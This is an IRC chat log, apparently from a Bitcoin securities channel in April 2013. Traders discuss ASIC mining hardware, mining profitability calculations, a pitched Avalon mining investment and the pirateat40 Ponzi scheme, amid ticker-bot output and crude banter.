17:45:31 yes retarded Apr 26 17:45:35 yeah buying at over 100 is not something id brag about Apr 26 17:45:59 we are not even sure if he has money or is just a troll Apr 26 17:46:18 he tried to prove he had money by moving 13 btc and it never showed up on the block chain.... Apr 26 17:46:43 he might not have any btc Apr 26 17:46:48 dunno Apr 26 17:47:39 strange he is not aware that he cant sign an addy Apr 26 17:47:46 i mean Apr 26 17:47:53 sign something with priv key of an addy Apr 26 17:48:21 he sent from a fucking web wallet Apr 26 17:48:24 perhaps his web wallet, nm says it all Apr 26 17:48:44 you can sign from blockchain.info wallet Apr 26 17:48:51 who the fuck uses a web wallet? i understand maybe the troll had one but a guy with 24k or 2.4k lol Apr 26 17:49:09 o looky Apr 26 17:49:10 https://bitcointalk.org/index.php?topic=188304.0 Apr 26 17:49:15 what is easywallet? iv never used it Apr 26 17:49:18 it must have rained recently Apr 26 17:49:49 "its time to make a change" cause you defo wont be "making a bank" Apr 26 17:52:49 http://www.rollingstone.com/politics/news/everything-is-rigged-the-biggest-financial-scandal-yet-20130425 Apr 26 17:53:24 howdy truf Apr 26 17:54:13 what happened to tiberslav? Apr 26 17:54:17 i was just impressed that rolling stone changed their position. my panties are in the laundry. Apr 26 17:55:02 he's nowhere with /ignore! Apr 26 17:55:08 https://bitcointalk.org/index.php?topic=187469.0 Apr 26 17:55:09 yes Apr 26 17:55:16 i think they are that retarded. Apr 26 17:57:42 1 btc = 1000 nBTC? Apr 26 17:57:45 [BTCTC] [ASICMINER-PT] 2 @ 1.198 = 2.396 BTC [+] Apr 26 17:57:45 mBTC? Apr 26 17:57:54 Chaang-Noi: mBTC Apr 26 17:58:05 Chaang-Noi: 1 btc = 1 000 000 nBTC Apr 26 17:58:08 [BTCTC] [ASICMINER-PT] 3 @ 1.198 = 3.594 BTC [+] Apr 26 17:58:09 you know he has a party or gathering or something in finland? <<< Ahahahah Apr 26 17:58:26 oh, no.. 1 btc = 1 000 mBTC = 1 000 000 uBTC = 1 000 000 000 nBTC Apr 26 17:58:29 mp did you not get the invite? Apr 26 17:58:30 dude this is so ridiculous Apr 26 17:58:39 its like in 2 weeks as well Apr 26 17:58:56 i am fond of the ignore function Apr 26 17:59:02 [BTCTC] [BASIC-MINING] 3 @ 0.400001 = 1.2 BTC [-] Apr 26 17:59:09 so did he hear about my thing and is trying to copy retardedly Apr 26 17:59:12 or just natural retard ? Apr 26 17:59:36 [BTCTC] [COG.F] 1 @ 2.3 BTC [-] Apr 26 17:59:55 i want to post in public is pm to me but i dont want to violate privacy issues Apr 26 18:00:05 [BTCTC] [ASICMINER-PT] 3 @ 1.198 = 3.594 BTC [+] Apr 26 18:01:05 kinda worth it for the lulz, Apr 26 18:01:07 [BTCTC] [S.DICE-PT] 44 @ 0.00307 = 0.1351 BTC [-] Apr 26 18:01:10 kinda not worth it dfor the drama Apr 26 18:01:23 [BTCTC] [S.DICE-PT] 98 @ 0.00306 = 0.2999 BTC [-] Apr 26 18:01:31 [BTCTC] [S.DICE-PT] 570 @ 0.00306 = 1.7442 BTC [-] Apr 26 18:01:47 he said he was going to make it public somewhere Apr 26 18:01:49 [BTCTC] [S.DICE-PT] 130 @ 0.00301 = 0.3913 BTC [-] Apr 26 18:01:53 but i never saw that Apr 26 18:01:55 sharing pms violates privacy issues? Apr 26 18:02:06 [HAVELOCK] [VTX] 6 @ 0.4244 = 2.5464 BTC [-] Apr 26 18:02:20 violates trust only, i thought Apr 26 18:02:24 [BTCTC] [ASICMINER-PT] 2 @ 1.1999 = 2.3998 BTC [+] Apr 26 18:02:25 it is a personal invite to his party, i dont think i should share it word for word Apr 26 18:02:38 fine its a trust issue, Apr 26 18:02:39 oh i get it Apr 26 18:02:48 like it has personal info in it Apr 26 18:03:02 it has info he said he would make public Apr 26 18:03:09 but i dont know where or if he has Apr 26 18:04:33 hey kako that thread is self moderated Apr 26 18:04:37 http://i.imgur.com/xQE0Tgsl.jpg Apr 26 18:04:40 he is going to get rid of all of that Apr 26 18:04:47 ajhahaha dude bought a $5 ad in an ad paper Apr 26 18:04:49 bwahahaha Apr 26 18:04:57 dude never has so much been attempted with so little. Apr 26 18:05:13 I understand MP was looking for me? Apr 26 18:05:25 its a scam mp? Apr 26 18:05:52 I dunno, I got a message on reddit Apr 26 18:06:01 not much info was given, and I was curious Apr 26 18:06:03 Girlfawkesy hey there. Apr 26 18:06:15 what is #bitcoin-assets? Apr 26 18:06:22 bitcoin-asshats? Apr 26 18:06:25 gypsy bazaar Apr 26 18:06:29 its a virtual lobby for mp ? Apr 26 18:06:31 jcpham: temple of mircea_popescu =) Apr 26 18:06:38 what is traded on this bazaar ? Apr 26 18:06:44 imsaguy is alive ?! Apr 26 18:06:47 mp has a following? Apr 26 18:06:47 slaves Apr 26 18:06:48 tears Apr 26 18:06:50 sadness Apr 26 18:06:52 dreams Apr 26 18:06:53 mircea_popescu: I was on a trip Apr 26 18:06:56 Technologov__ its the place where bitcoin securities get discussed. Apr 26 18:07:06 such as ? Apr 26 18:07:11 Are there any ? ^^ Apr 26 18:07:14 these guys in otc are selling an ASIC startup Apr 26 18:07:16 !ticker m s.mpoe Apr 26 18:07:17 [MPEX:S.MPOE] 1D: 0.00067399 / 0.00069538 / 0.000703 (298127 shares, 207.31 BTC), 7D: 0.00064141 / 0.0006982 / 0.00073891 (2649171 shares, 1,849.67 BTC), 30D: 0.00059218 / 0.00068714 / 0.00073891 (10288649 shares, 7,069.75 BTC) Apr 26 18:07:19 !ticker m s.dice Apr 26 18:07:20 telling people 200% returns Apr 26 18:07:21 [MPEX:S.DICE] 1D: 0.00278789 / 0.00278789 / 0.00278789 (1309 shares, 3.65 BTC), 7D: 0.0023263 / 0.00295308 / 0.00349995 (32043 shares, 94.63 BTC), 30D: 0.0012 / 0.00317689 / 0.00448 (1524631 shares, 4,843.59 BTC) Apr 26 18:07:23 !ticker m s.bbet Apr 26 18:07:24 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0.00050015 / 0.00177875 / 0.00201395 (137670 shares, 244.88 BTC) Apr 26 18:07:25 etc. Apr 26 18:07:26 i told 'em to come here! Apr 26 18:07:51 I think asicminer needs a passthrough on mpex Apr 26 18:08:00 they're everywhere else Apr 26 18:08:02 lol Apr 26 18:08:07 think asicminer needs to send me some blades Apr 26 18:08:10 better yet Apr 26 18:08:11 so i can erupt some shit Apr 26 18:08:17 AM does not need it, mpex might need it Apr 26 18:08:17 a passthrough for the passthroughs Apr 26 18:08:21 make a synthetic Apr 26 18:08:26 we could proxy all the proxies Apr 26 18:08:32 exactly Apr 26 18:08:38 imsaguy the day they sign a contract. Apr 26 18:08:42 AM has all the funding they need, they dont need shit Apr 26 18:08:45 Apr 26 18:08:56 mp, friedcat will never sign a contract Apr 26 18:08:59 mircea_popescu: AM needs to sign if its a passthrough? Apr 26 18:09:06 mircea_popescu: can you read chinese? Apr 26 18:09:14 they need to sign if its on mpex. Apr 26 18:09:22 they wont sign Apr 26 18:09:34 why take a risk with no gain? Apr 26 18:09:35 those chinese won't sign anything unless its in chinese Apr 26 18:09:52 stupid china Apr 26 18:10:04 its a moot point, like Chaang says, they don't need anything Apr 26 18:10:06 i can't be stonewalled. he won't sign, he won't exist pretty much. Apr 26 18:10:07 forget about asicminer Apr 26 18:10:14 imsaguy: lol Apr 26 18:10:16 get in on the ground floor of peachMining Apr 26 18:10:24 imsaguy: Use google translate.. Apr 26 18:10:26 :P Apr 26 18:10:30 haha AM wont exist :) hahahah Apr 26 18:10:33 jcpham, I'm goign to form my own asic company Apr 26 18:10:39 tell me more BTCOxygen Apr 26 18:10:42 10% of the network and soon to be 20% Apr 26 18:10:42 There is an opportunity to Invest in Avalon ASIC chips. Apr 26 18:10:42 Run by . Apr 26 18:10:47 https://bitcointalk.org/index.php?topic=184305.0 Apr 26 18:10:52 -otc is a terrible place to sell the idea Apr 26 18:10:55 Chaang-Noi, they've been promising for a while Apr 26 18:11:03 they're starting to sound like bfl Apr 26 18:11:03 imsaguy: cant help but misread your nick as imsogay :'( Apr 26 18:11:03 always delays Apr 26 18:11:05 [HAVELOCK] [SDICE] 1 @ 0.29999997 BTC [+] Apr 26 18:11:06 [HAVELOCK] [SDICE] 1 @ 0.29999998 BTC [+] Apr 26 18:11:10 Scrat for good reason. Apr 26 18:11:17 they ahve the chips, they dont have the power Apr 26 18:11:17 Scrat: it happens to those with a reading level below the american fourth grade Apr 26 18:11:19 imsogay Apr 26 18:11:21 did you read his update today? Apr 26 18:11:23 so funny Apr 26 18:11:27 and anyway they have 7.7 TH Apr 26 18:11:32 that is much more than not existing Apr 26 18:11:36 they're supposed to have like 12 TH Apr 26 18:11:42 like 3 months ago Apr 26 18:11:49 ^ Apr 26 18:11:57 how are they going to add 50 more if they can't get teh original going? Apr 26 18:11:58 they did, they just didnt share Apr 26 18:12:05 my point was, MP claim of them not existing if they are not on his eschagne is lulz Apr 26 18:12:08 ThickAsThieves, most likely Apr 26 18:12:16 so 2.8TH/s for 3500BTC? Apr 26 18:12:20 Chaang-Noi: he meant they won't exist on the exchange, derp Apr 26 18:12:25 ;;genrate 28000000 Apr 26 18:12:27 The expected generation output, at 28000000.0 Mhps, given difficulty of 8974296.01489, is 1569.07933912 BTC per day and 65.3783057965 BTC per hour. Apr 26 18:12:28 Can I create options? and do I have to keep a balance to cover them? (and what do I have to do with puts, because they may cost ~inf in case if price will go to 0)? Apr 26 18:12:38 Cylta yes, you can create options. you need to cover them. Apr 26 18:12:42 jcpham: 3TH/s. Apr 26 18:12:48 imsaguy and that is what i told you Apr 26 18:12:51 Will update OP in few hours. Apr 26 18:12:56 ;;calc 3500*[ticker --avg] Apr 26 18:12:57 476259.42 Apr 26 18:13:00 they dont need anything. Apr 26 18:13:10 ;;bc,stats Apr 26 18:13:13 Current Blocks: 233265 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 590 blocks | Next Difficulty In About: 3 days, 6 hours, 40 minutes, and 0 seconds | Next Difficulty Estimate: 9964156.51421 | Estimated Percent Change: 11.02995 Apr 26 18:13:18 THey need content shareholders. Apr 26 18:13:23 what's the timeline until deployed BTCOxygen Apr 26 18:13:26 Well, technically, they don't even need that. Apr 26 18:13:31 they have content shareholders Apr 26 18:13:33 At this point, asicminer has the shareholders by the balls. Apr 26 18:13:35 jcpham: ~July. Apr 26 18:13:37 jcpham thats one zero too many Apr 26 18:13:44 ;;genrate 2800000 Apr 26 18:13:45 The expected generation output, at 2800000.0 Mhps, given difficulty of 8974296.01489, is 156.907933912 BTC per day and 6.53783057965 BTC per hour. Apr 26 18:13:48 ? Apr 26 18:13:59 ;;generate 3000000 Apr 26 18:14:00 Error: "generate" is not a valid command. Apr 26 18:14:08 ;;genrate 3000000 Apr 26 18:14:10 The expected generation output, at 3000000.0 Mhps, given difficulty of 8974296.01489, is 168.115643477 BTC per day and 7.00481847819 BTC per hour. Apr 26 18:14:36 i'm betting we're way way over 20mil by july in diff Apr 26 18:14:43 there's this crazy gbet about 10mn diff by end of month Apr 26 18:14:48 im so curious which way it neds Apr 26 18:14:56 like 10-20k riding on it Apr 26 18:14:58 ;;genrate 3000000 20000000 Apr 26 18:14:58 The expected generation output, at 3000000.0 Mhps, given difficulty of 20000000.0, is 75.4359774646 BTC per day and 3.14316572769 BTC per hour. Apr 26 18:15:02 mircea_popescu, which side are you on? Apr 26 18:15:07 neither actually Apr 26 18:15:12 jcpham: Even if difficulty hit 35mil you are still safe. Apr 26 18:15:28 ;;calc 75*[ticker --avg]*30 Apr 26 18:15:28 306166.77 Apr 26 18:15:29 anyone saying a 10x diff hike is nbd is crazy Apr 26 18:15:51 at 20 mil difficulty who is selling the $306k in coins you mine in july Apr 26 18:16:19 imsaguy: So you are saying that the difficulty will not hit 100m ? Apr 26 18:16:23 ;;genrate 3000000 40000000 Apr 26 18:16:24 The expected generation output, at 3000000.0 Mhps, given difficulty of 40000000.0, is 37.7179887323 BTC per day and 1.57158286385 BTC per hour. Apr 26 18:16:30 follow up question Apr 26 18:16:36 jcpham: Profits will be paid out to investors in Bitcoins. Apr 26 18:16:37 ;;calc 37*[ticker --avg]*30 Apr 26 18:16:38 151040.4084 Apr 26 18:16:40 I know difficuilty will hit much higher than that Apr 26 18:16:49 who sel the 150k in coins the new month at 40 mil Apr 26 18:17:02 it difficult for me to trust Apr 26 18:17:16 jcpham: Why sell the coins ? Apr 26 18:17:26 ic Apr 26 18:17:33 you are right Apr 26 18:17:47 but you want btc upfront? Apr 26 18:18:00 jcpham: Dividends will be paid in Bitcoins. Apr 26 18:18:11 jcpham: Yes we need funding for the project. Apr 26 18:18:23 name "we" Apr 26 18:18:26 publicly Apr 26 18:19:17 Our team Apr 26 18:19:28 Our = I and my partner. Apr 26 18:19:49 This interview is going well. Apr 26 18:19:53 <.< Apr 26 18:19:54 team = The people working for us. Apr 26 18:19:54 >.> Apr 26 18:19:58 you should get used to saying "me John Q Whatever and my partner Steven X> whocares" Apr 26 18:20:03 the chinese Apr 26 18:20:13 BTCOxygen: are they chinese? Apr 26 18:20:20 http://btcoxygen.com/ Apr 26 18:20:28 it's half mil in BTC up front Apr 26 18:20:41 Technologov__: mining pool software is prepackaged these days. it doesn't take rocket science to run it. Apr 26 18:21:02 it's a great idea but you'll need more of a following Apr 26 18:22:04 imsaguy: Yeah it does not need rocket science, Also we built our custom poolserver, Plus we have paid users without troubles. Apr 26 18:22:14 Thats what brings the trust. Apr 26 18:22:34 Paying users = trust. Apr 26 18:22:45 you're right Apr 26 18:22:47 I apologize Apr 26 18:23:02 http://ts3.mm.bing.net/th?id=H.4868208981114978&pid=1.7 Apr 26 18:24:07 imsaguy: heh. Apr 26 18:24:14 If anyone is interested please PM me. Apr 26 18:24:53 jcpham, read: https://bitcointalk.org/index.php?topic=184305.0 Apr 26 18:26:18 i'm not going to jump on the tread and be mean but like those guys are saying Apr 26 18:26:35 3500 btc upfront and AT BEST you'll generate 150BTC/monthly Apr 26 18:26:41 ;;calc 3500/150 Apr 26 18:26:41 23.3333333333 Apr 26 18:26:45 23 month roi Apr 26 18:26:50 assuming rainbows Apr 26 18:26:58 and there are no rainbows here Apr 26 18:27:21 it is 150 btc daily Apr 26 18:27:28 oh shit Apr 26 18:27:35 u right my maths is so bad Apr 26 18:27:48 where do i sign up? I have 1 btc to contrtibute Apr 26 18:27:49 but that doesn't make it anymore viable Apr 26 18:27:56 as you said it's a lot of dough upfront Apr 26 18:28:03 i'd like one share please. Apr 26 18:28:22 You owe Topace 20 btc right? Apr 26 18:28:37 that you have not paid in how long Apr 26 18:28:39 ? Apr 26 18:29:38 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [+] Apr 26 18:30:49 wow price of btc looks higer for once on btc-e Apr 26 18:31:21 its not Apr 26 18:31:22 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Apr 26 18:31:23 my bad cached Apr 26 18:31:24 [BTCTC] [PAJKA.BOND] 17 @ 0.09749 = 1.6573 BTC [-] Apr 26 18:31:33 you're right Apr 26 18:31:48 [BTCTC] [PAJKA.BOND] 1 @ 0.09749 BTC [-] Apr 26 18:32:10 jcpham: Pm me if interested. Apr 26 18:32:28 jborkl: I have been paing him from my profits. Apr 26 18:32:49 ;;calc 3500/(150 * 30) Apr 26 18:32:50 0.777777777778 Apr 26 18:33:00 jcpham: ^^^ Apr 26 18:35:38 truffles: It sounds cool to me. Apr 26 18:39:33 Nice site: http://www.satoshiplay.com/ Apr 26 18:40:07 Proudly powered by WordPress. GamePress ? Apr 26 18:44:54 "I think rpietila is very close to establishing cult of personality. What MP achieves with mental coercion, rpietila does using humour, and with ease." Apr 26 18:45:05 lol Apr 26 18:45:09 who is that guy? Apr 26 18:45:12 no srlsy, the bitcointalk forum is like... seinfeld. Apr 26 18:45:27 MJR_ i totally have no idea. Apr 26 18:45:46 hmmm i think i am going to do an otc transaction Apr 26 18:45:46 "some douche" is the best i got out of mpoe-pr Apr 26 18:45:49 or at least try Apr 26 18:46:07 So what kind of assets are here? Apr 26 18:46:17 Any good Bitcoins companies traded ? Apr 26 18:46:22 start-ups ? Apr 26 18:47:21 yes. Apr 26 18:49:32 [BTCTC] [PAJKA.BOND] 46 @ 0.0975 = 4.485 BTC [+] Apr 26 18:50:53 hmmm Apr 26 18:51:02 anyone here know of a quick cash option? Apr 26 18:51:08 I feel dumb for reading part of that reptelia thread Apr 26 18:51:23 reminds me why I do not read the forum Apr 26 18:51:30 MJR_ what do you mean quick cash option ? Apr 26 18:52:13 MJR_: pirate? but unfortunately he temporarly suspended his project =) Apr 26 18:52:48 cylta: FYI, He permenently suspended his project. Apr 26 18:52:57 stop spreading fud Apr 26 18:52:59 BTCOxygen: <\irony> Apr 26 18:53:34 who is "he" ? Apr 26 18:53:38 And which project ? Apr 26 18:57:22 http://polimedia.us/dtng/c/src/136699181151.jpg check out the cat. Apr 26 18:57:50 mircea_popescu: wat cat Apr 26 18:58:20 yes a cat is there, zoom moar Apr 26 18:58:39 jurov has immunity. Apr 26 18:59:04 slightly intoxicated Apr 26 18:59:05 i see no cat Apr 26 18:59:10 not even in teh slightest bit Apr 26 18:59:15 I see two cats =) Apr 26 18:59:18 maybe if upside down ? Apr 26 18:59:25 two cats at 10 o'clock Apr 26 18:59:30 i smell pussy Apr 26 18:59:36 so wash. Apr 26 18:59:50 :3 Apr 26 18:59:54 lol Apr 26 19:00:17 ˙ɹǝʇʇǝq ɥɔnɯ s,ʇɐɥʇ ˙ʍou ʇı ǝǝs ı 'ʞo ɥɐ :nɔsǝdod‾ɐǝɔɹıɯ Apr 26 19:00:28 haha Apr 26 19:01:01 [11:27:57] You owe Topace 20 btc right? Apr 26 19:01:07 ^ indeed he does Apr 26 19:01:45 i read that as Tupac Apr 26 19:01:47 =/ Apr 26 19:02:38 that's intentional Apr 26 19:02:47 he's trying to start a personality cult Apr 26 19:05:06 [HAVELOCK] [VTX] 5 @ 0.4244 = 2.122 BTC [-] Apr 26 19:09:05 [HAVELOCK] [KCIM] 4 @ 1.21 = 4.84 BTC [-] Apr 26 19:36:59 can someone help me?)) Apr 26 19:37:39 hello hellohello Apr 26 19:39:59 Technologov__: pirateat40 was a scammer. Apr 26 19:40:06 He ran away with the bitcoins. Apr 26 19:40:19 ??? I never ever heard of him. Apr 26 19:40:33 How an investor be a scammer ? Apr 26 19:40:40 Technologov__: Yeah because he ran away long ago. Apr 26 19:40:42 Either he invests or he does not. Apr 26 19:40:49 He is not an Investor. Apr 26 19:41:01 He was running the project. Apr 26 19:41:08 then what ? Which project ? Apr 26 19:41:46 Technologov__: He was paying a high interest rate to users who invested with him. Apr 26 19:41:59 aha. Typical ponzi. Apr 26 19:42:06 yep. Apr 26 19:42:34 There is no risk-free interest above government bonds. Really. Apr 26 19:42:43 maybe 3% at most. Apr 26 19:42:57 As a small investor, I know it for sure. Apr 26 19:43:16 Anything above that takes risk (and time). Apr 26 19:43:21 Technologov__: FYI, He ran away with 100,000 Bitcoins. Apr 26 19:43:27 YAY ! Apr 26 19:43:36 huge amount Apr 26 19:43:36 Technologov__: goverment bonds are not risk-free. Apr 26 19:43:50 I don't want to do the math its painfull. Apr 26 19:43:55 Cylta, why not ? gvmt can simply print money to return cash. Apr 26 19:44:02 so it is risk-free. Apr 26 19:44:13 heya hellohello Apr 26 19:44:27 gvmt has no reason to default on own obligations. Apr 26 19:44:34 hi Apr 26 19:44:39 Technologov__: ahhh, in this meaning... yes. but money can default (or start to huperinflate) Apr 26 19:44:40 ;;calc 100000*[ticker --avg] Apr 26 19:44:42 13572660.0 Apr 26 19:44:55 Technologov__: ^^^ Here is the math. Apr 26 19:45:12 (only if they use someone else's money, like in Spain... those PIGS - pirtugal, italy, greece, spain) Apr 26 19:45:22 BTCOxygen: for such amount you should take 30d avg... Apr 26 19:46:37 Also IIRC he converted bitcoins to USD as soon as he recieved them. Apr 26 19:46:45 So hes not that rich. Apr 26 19:47:06 converting 100,000 BTC takes time... Apr 26 19:47:25 [MPEX] [S.DICE] 1791 @ 0.00278789 = 4.9931 BTC [-] Apr 26 19:47:38 Technologov__: He recieved in small chunks with a total of 100,000 before he ran away. Apr 26 19:47:42 not if you're in the wot. took him all of a day oir w./e Apr 26 19:48:25 http://www.wired.com/wiredenterprise/2013/04/butterfly/ Apr 26 19:48:45 2 more weeks! Apr 26 19:48:46 Meanwhile, Butterfly Labs is nowhere near full production capacity. The company says that its systems will continue to trickle out, with another 75 to 150 shipping in the next few weeks. Apr 26 19:48:47 In the meantime, if you have an questions about the Butterfly Labs machine, send us an email. Apr 26 19:48:50 ahaha noway Apr 26 19:49:13 jcpham: i think I heared it somewhere already... Apr 26 19:49:30 wired says fuck you Apr 26 19:49:34 if you think it's fake Apr 26 19:49:39 BTCOxygen, and I have a fear about similar fate with Avalon ASICs Apr 26 19:49:40 that's why I wanna wait until ppl will start receiving first batch units Apr 26 19:49:40 + dev boards Apr 26 19:49:40 I _do_ believe the ASICs are real Apr 26 19:49:48 because of this: http://bitcoin.sipa.be/ Apr 26 19:49:58 so when it turens out to be actually fakwe Apr 26 19:50:02 But I highly doubt, that they will ship any. Apr 26 19:50:03 i guess we all sue wired. this is good news. Apr 26 19:50:19 conde nast actually has money, so... Apr 26 19:50:23 i'm tickled pink over here. Apr 26 19:50:38 first batch of avalon already reached their customers, no? Apr 26 19:50:44 yea. Apr 26 19:50:47 More probably they will keep to themselves. (so their accepted BTC might be a scam) Apr 26 19:51:16 these guys at BFL are masters of hype Apr 26 19:51:24 i give them credit where it is due Apr 26 19:51:40 jcpham its literally not that hard to do. get a journo dood to post nonsense ? 100 bux or w/e Apr 26 19:51:46 Technologov__: There are 300 working units. Apr 26 19:52:03 but i mean like the company name is unassuming and disarming even "butterfly" Apr 26 19:52:05 wtf Apr 26 19:52:10 I know 5-6 people personally who recieved their Avalon. Apr 26 19:52:12 it's all smoke and mirrors Apr 26 19:52:29 but they have produced a product Apr 26 19:52:38 no. Only 3 developers IMO. Apr 26 19:52:38 1st batch Avalons did *not* reach end-users (buyers). Apr 26 19:52:38 jcpham, I doubt if Avalon are better Apr 26 19:52:38 where? At their company ? Apr 26 19:52:39 so i digress for now until it collapses Apr 26 19:52:39 Show me 20 users, whom actually _received_ any ASICs. Apr 26 19:52:40 I could not find not on forums and not in chat Apr 26 19:52:57 But this graph: http://bitcoin.sipa.be/ Apr 26 19:53:07 Clearly says that ASICs are for real. Apr 26 19:53:10 i know of 3 actual avalons Apr 26 19:53:19 and the owners and i've spoken with them Apr 26 19:53:23 that's it Apr 26 19:53:30 my world is small though Apr 26 19:54:03 Technologov__: I mean I know end-users. Apr 26 19:54:16 There are 5 Avalons mining at my pool tho. Apr 26 19:54:48 but the risk-reward is potentially so high, that it is worth the (limited) risk. Apr 26 19:54:55 I think even imsaguy has an Avalon. Apr 26 19:54:57 hmm, good to know. Apr 26 19:55:29 BTCOxygen which pool is that again ? Apr 26 19:55:36 BTCOxygen :) Apr 26 19:55:52 http://btcoxygen.com Apr 26 19:56:03 http://blockchain.info/pools ? Apr 26 19:56:34 you telling me 5 avalons doesn't get you in the list ? Apr 26 19:56:43 yes. Apr 26 19:56:57 what's an avalon, 60gh ? Apr 26 19:57:02 300GH/s barely gets blocks Apr 26 19:57:05 need moar Apr 26 19:57:06 Also they don't list blocks properly. Apr 26 19:57:21 500GH/s Apr 26 19:57:37 how is 500 GH/s regular blocks? Apr 26 19:57:40 daily? Apr 26 19:57:50 mk, otherwise : Top Hashers 63gh/s Apr 26 19:57:58 seems there's one avalon there, and it does 80% or so of the pool ? Apr 26 19:58:18 check* Apr 26 19:58:25 100-400GH/s was struggling to keep up a few months back Apr 26 19:58:30 from talking with pool ops Apr 26 19:58:38 be interesting to see how it paces now Apr 26 19:59:21 Now, the hash rate: Apr 26 19:59:22 <-- Cylta has quit (Ping timeout: 272 seconds) Apr 26 19:59:25 http://blockchain.info/charts/hash-rate Apr 26 19:59:53 If this graph would be flat, I would buy a GPU, and not believe into ASIC lore. Apr 26 20:00:10 But due to huge spike, I believe, that ASICs actually exist. Apr 26 20:00:26 mircea_popescu: I see 3 Avalons. Apr 26 20:00:38 where ? Apr 26 20:00:56 2 users pointing 1/3 Avalon. Apr 26 20:01:02 otc is too stressful Apr 26 20:01:28 must be BFL Apr 26 20:01:40 testing for 4 month Apr 26 20:01:40 my friend has some of their fpga stuff Apr 26 20:01:45 #1 1510 62186 Apr 26 20:01:45 #2 1160 14981 Apr 26 20:01:45 #3 1210 14272 Apr 26 20:01:50 nice hardware Apr 26 20:01:55 seems to me only 1st can be an avalon. right ? Apr 26 20:02:03 imsaguy: you here? Apr 26 20:02:12 he has one BTCOxygen Apr 26 20:02:21 mircea_popescu: 1st is full Avalon. Apr 26 20:02:39 The other 2 are 1/3 Avalon. Apr 26 20:02:45 imsogay owns an avalon Apr 26 20:03:10 1/3 avalon ? hmm... 20 GH/s ? Apr 26 20:03:11 Also there a many users posting about their Avalon on bitcointalk. Apr 26 20:03:13 hmm... Apr 26 20:03:24 1/3 avalon ?! Apr 26 20:03:26 wut Apr 26 20:03:27 who dioes this lol Apr 26 20:03:42 Its a cgminer feature. Apr 26 20:03:56 load balancing of cgminer Apr 26 20:04:05 imsaguy: Yeah. Apr 26 20:04:17 why did you highlight me? Apr 26 20:05:03 he would like to have your babies. Apr 26 20:05:04 imsaguy: How many Avalon users do you know? Apr 26 20:05:20 [BTCTC] [ASICMINER-PT] 4 @ 1.2 = 4.8 BTC [+] Apr 26 20:07:24 mircea_popescu: that is quite impossible Apr 26 20:07:34 BTCOxygen: a few. Apr 26 20:07:57 you have been accues of having onw yourself Apr 26 20:08:01 *accused Apr 26 20:08:42 owning an asic is accusation now Apr 26 20:08:43 hmm Apr 26 20:08:58 my bad Apr 26 20:09:11 i tell lies on the internet for fun Apr 26 20:09:14 no one owns asic Apr 26 20:09:32 some ppl do. proof ? Apr 26 20:09:46 facedesk. Apr 26 20:09:52 jcpham, http://blockchain.info/charts/hash-rate Apr 26 20:10:01 that's just a chart Apr 26 20:10:07 those numbers could be made up Apr 26 20:10:10 Anyone who clains that there are no Avalons in the wild should read this whole thread. Apr 26 20:10:11 https://bitcointalk.org/index.php?topic=137534.0 Apr 26 20:10:16 jurov: i think the rational explanation would be: give impression you want to get asics "out there so people dont lose trust" but in fact keep it private for as long as possible :) Apr 26 20:10:21 going from 20 to 80 GH/s (in a MONTH !!!) can not be done via GPU. Apr 26 20:10:33 Technologov__: yes. Apr 26 20:10:34 cpu mining botnet probably Technologov__ Apr 26 20:10:41 lol Apr 26 20:10:45 ;) Apr 26 20:10:50 jcpham, LOL ! How u tried mining on CPU ? Apr 26 20:11:02 Technologov__: rpcminr :P Apr 26 20:11:02 nah pool won't accept a share for shit Apr 26 20:11:07 it is 100 times slower than GPU and 100,000 times slower than ASIC Apr 26 20:11:07 hurrrrrr Apr 26 20:11:16 the conspiracy is strong in here. Apr 26 20:11:34 CPU mining will cost you x100 more in electricity than Bitcoins you produce... Apr 26 20:11:57 Technologov__: +100 for having that knowledge. Apr 26 20:11:59 i bet it's confusing talking to me. Apr 26 20:12:04 i believe asic exists. yes. Apr 26 20:12:31 but really, i see it like either many asic users want to stay secret, or they are chinese not on btctalk Apr 26 20:12:32 seeing is believing Apr 26 20:12:42 or manufacturers mine themselves instead Apr 26 20:12:56 yeah the technology has made it like this Apr 26 20:12:56 I would invest in ASIC company yes, but I dunno any. Apr 26 20:13:08 a device that makes thousands of bucks a day potentially is a security risk Apr 26 20:13:10 jurov: even chinese guys reported selective vip treatment in regards to shipments from avalon Apr 26 20:13:14 if BTCOxygen can find any, I might invest (@_@) Apr 26 20:14:20 http://mobile.news.com.au/national-news/killer-escaped-prison-after-being-issued-picture-of-master-key-to-all-locks Apr 26 20:14:56 404 Apr 26 20:15:00 but title sounds interesting Apr 26 20:15:06 damnit Apr 26 20:15:22 http://mobile.news.com.au/national-news/killer-escaped-prison-after-being-issued-picture-of-master-key-to-all-locks/story-fncynjr2-1226629878591 Apr 26 20:15:28 i cut off the numbers Apr 26 20:15:44 saw that before !! some ppl make key with picture on flicker !! Apr 26 20:15:58 pretty dumb for a prison Apr 26 20:16:26 maybe it was recruitment practice of mossad Apr 26 20:16:29 not sure a single master key falls under byzantine failover Apr 26 20:16:42 you know, sieve through thousands of retarded criminals to find one smart enough Apr 26 20:17:16 perfect storm, a jeweler, a criminal, and a book Apr 26 20:19:05 Technologov__: Oh I found a very interesting thread for you. Apr 26 20:19:06 https://bitcointalk.org/index.php?topic=141154.0 Apr 26 20:19:10 oz story lol Apr 26 20:20:42 Here one user posted pictures of his Avalon. Apr 26 20:20:43 https://bitcointalk.org/index.php?topic=141154.msg1699573#msg1699573 Apr 26 20:21:21 Anyone who is not sure if Avalon will ship should read this thread from page 1 to 11. Apr 26 20:21:24 https://bitcointalk.org/index.php?topic=141154.0 Apr 26 20:22:51 truffles, u can invest in Avalon here: https://bitcointalk.org/index.php?topic=184305.0 Apr 26 20:24:34 I did not had either until a week ago ^^ Apr 26 20:24:43 I bought them via Western Union. Apr 26 20:24:50 at #bitcoin-otc Apr 26 20:25:14 because my $3000 Rig PC generates only 0.001 BTC per day. Apr 26 20:25:24 (on dual GPUs) Apr 26 20:25:52 just two? Apr 26 20:25:56 ;) Apr 26 20:26:04 yeah, only 2. Apr 26 20:26:53 and what ? I worked at Cisco Systems. There are *much* more cables there. I assure you. Apr 26 20:27:39 any large company has a data-center those days. Apr 26 20:27:57 ew gross owning your own data centers Apr 26 20:28:06 great way to keep your sysadmin costs high Apr 26 20:28:30 <-- cloud ops Apr 26 20:29:31 meh Apr 26 20:29:34 depends on how we code it Apr 26 20:29:46 if we write it to minimize entropy, that would be cool 